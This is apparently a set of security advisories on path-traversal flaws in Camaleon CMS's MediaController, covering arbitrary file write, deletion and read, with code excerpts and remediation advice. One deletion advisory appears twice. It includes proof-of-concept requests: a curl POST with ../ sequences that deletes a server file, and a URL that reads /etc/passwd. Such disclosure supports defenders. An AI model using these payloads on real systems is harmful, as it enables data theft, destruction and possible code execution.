An arbitrary file write vulnerability accessible via the upload method of the MediaController allows authenticated users to write arbitrary files to any location on the web server Camaleon CMS is running on (depending on the permissions of the underlying filesystem). E.g. This can lead to a delayed remote code execution in case an attacker is able to write a Ruby file into the config/initializers/ subfolder of the Ruby on Rails application.

Once a user upload is started via the upload method, the file_upload and the folder parameter.

def upload(settings = {})
  params[:dimension] = nil if params[:skip_auto_crop].present?
  f = { error: 'File not found.' }
  if params[:file_upload].present?
    f = upload_file(params[:file_upload],
                    { folder: params[:folder], dimension: params['dimension'], formats: params[:formats], versions: params[:versions],
                      thumb_size: params[:thumb_size] }.merge(settings))
  end
  [..]
end

are passed to the upload_file method. Inside that method the given settings are merged with some presets. The file format is checked against the formats settings we can override with the formats parameters.

# formats validations
  return { error: "#{ct('file_format_error')} (#{settings[:formats]})" } unless cama_uploader.class.validate_file_format(
    uploaded_io.path, settings[:formats]
 )

Our given folder is then passed unchecked to the Cama_uploader:

key = File.join(settings[:folder], settings[:filename]).to_s.cama_fix_slash
res = cama_uploader.add_file(settings[:uploaded_io], key, { same_name: settings[:same_name] })

In the add_file method of CamaleonCmsLocalUploader this key argument containing the unchecked path is then used to write the file to the file system:

def add_file(uploaded_io_or_file_path, key, args = {})
  [..]
  upload_io = uploaded_io_or_file_path.is_a?(String) ? File.open(uploaded_io_or_file_path) : uploaded_io_or_file_path
  File.open(File.join(@root_folder, key), 'wb') { |file| file.write(upload_io.read) }
  [..]
end

Impact

This issue may lead up to Remote Code Execution (RCE) via arbitrary file write.

Remediation

Normalize file paths constructed from untrusted user input before using them and check that the resulting path is inside the targeted directory. Additionally, do not allow character sequences such as .. in untrusted input that is used to build paths.

See Also

CodeQL: Uncontrolled data used in path expression OWASP: Path Traversal

The actions defined inside of the MediaController class do not check whether a given path is inside a certain path (e.g. inside the media folder). If an attacker performed an account takeover of an administrator account (See: GHSL-2024-184) they could delete arbitrary files or folders on the server hosting Camaleon CMS. The crop_url action might make arbitrary file writes (similar impact to GHSL-2024-182) for any authenticated user possible, but it doesn't seem to work currently.

Arbitrary file deletion can be exploited with following code path: The parameter folder flows from the actions method:

  def actions
    authorize! :manage, :media if params[:media_action] != 'crop_url'
    params[:folder] = params[:folder].gsub('//', '/') if params[:folder].present?
    case params[:media_action]
    [..]
    when 'del_file'
      cama_uploader.delete_file(params[:folder].gsub('//', '/'))
      render plain: ''

into the method delete_file of the CamaleonCmsLocalUploader class (when files are uploaded locally):

def delete_file(key)
  file = File.join(@root_folder, key)
  FileUtils.rm(file) if File.exist? file
  @instance.hooks_run('after_delete', key)
  get_media_collection.find_by_key(key).take.destroy
end

Where it is joined in an unchecked manner with the root folder and then deleted.

Proof of concept The following request would delete the file README.md in the top folder of the Ruby on Rails application. (The values for auth_token, X-CSRF-Token and _cms_session would also need to be replaced with authenticated values in the curl command below)

curl --path-as-is -i -s -k -X $'POST' \
    -H $'X-CSRF-Token: [..]' -H $'User-Agent: Mozilla/5.0' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: */*' -H $'Connection: keep-alive' \
    -b $'auth_token=[..]; _cms_session=[..]' \
    --data-binary $'versions=&thumb_size=&formats=&media_formats=&dimension=&private=&folder=..
2F..
2F..
2FREADME.md&media_action=del_file' \
    $'https://<camaleon-host>/admin/media/actions?actions=true'

Impact

This issue may lead to a defective CMS or system.

Remediation

Normalize all file paths constructed from untrusted user input before using them and check that the resulting path is inside the targeted directory. Additionally, do not allow character sequences such as .. in untrusted input that is used to build paths.

See also:

CodeQL: Uncontrolled data used in path expression OWASP: Path Traversal

The actions defined inside of the MediaController class do not check whether a given path is inside a certain path (e.g. inside the media folder). If an attacker performed an account takeover of an administrator account (See: GHSL-2024-184) they could delete arbitrary files or folders on the server hosting Camaleon CMS. The crop_url action might make arbitrary file writes (similar impact to GHSL-2024-182) for any authenticated user possible, but it doesn't seem to work currently.

Arbitrary file deletion can be exploited with following code path: The parameter folder flows from the actions method:

  def actions
    authorize! :manage, :media if params[:media_action] != 'crop_url'
    params[:folder] = params[:folder].gsub('//', '/') if params[:folder].present?
    case params[:media_action]
    [..]
    when 'del_file'
      cama_uploader.delete_file(params[:folder].gsub('//', '/'))
      render plain: ''

into the method delete_file of the CamaleonCmsLocalUploader class (when files are uploaded locally):

def delete_file(key)
  file = File.join(@root_folder, key)
  FileUtils.rm(file) if File.exist? file
  @instance.hooks_run('after_delete', key)
  get_media_collection.find_by_key(key).take.destroy
end

Where it is joined in an unchecked manner with the root folder and then deleted.

Proof of concept The following request would delete the file README.md in the top folder of the Ruby on Rails application. (The values for auth_token, X-CSRF-Token and _cms_session would also need to be replaced with authenticated values in the curl command below)

curl --path-as-is -i -s -k -X $'POST' \
    -H $'X-CSRF-Token: [..]' -H $'User-Agent: Mozilla/5.0' -H $'Content-Type: application/x-www-form-urlencoded; charset=UTF-8' -H $'Accept: */*' -H $'Connection: keep-alive' \
    -b $'auth_token=[..]; _cms_session=[..]' \
    --data-binary $'versions=&thumb_size=&formats=&media_formats=&dimension=&private=&folder=..
2F..
2F..
2FREADME.md&media_action=del_file' \
    $'https://<camaleon-host>/admin/media/actions?actions=true'

Impact

This issue may lead to a defective CMS or system.

Remediation

Normalize all file paths constructed from untrusted user input before using them and check that the resulting path is inside the targeted directory. Additionally, do not allow character sequences such as .. in untrusted input that is used to build paths.

See also:

CodeQL: Uncontrolled data used in path expression OWASP: Path Traversal

A path traversal vulnerability accessible via MediaController's download_private_file method allows authenticated users to download any file on the web server Camaleon CMS is running on (depending on the file permissions).

In the download_private_file method:

def download_private_file
  cama_uploader.enable_private_mode!

  file = cama_uploader.fetch_file("private/#{params[:file]}")

  send_file file, disposition: 'inline'
end

The file parameter is passed to the fetch_file method of the CamaleonCmsLocalUploader class (when files are uploaded locally):

def fetch_file(file_name)
  raise ActionController::RoutingError, 'File not found' unless file_exists?(file_name)

  file_name
end

If the file exists it's passed back to the download_private_file method where the file is sent to the user via send_file.

Proof of concept

An authenticated user can download the /etc/passwd file by visiting an URL such as:

https://<camaleon-host>/admin/media/download_private_file?file=../../../../../../etc/passwd

Impact

This issue may lead to Information Disclosure.

Remediation

Normalize file paths constructed from untrusted user input before using them and check that the resulting path is inside the targeted directory. Additionally, do not allow character sequences such as .. in untrusted input that is used to build paths.

See Also

• CodeQL: Uncontrolled data used in path expression
• OWASP: Path Traversal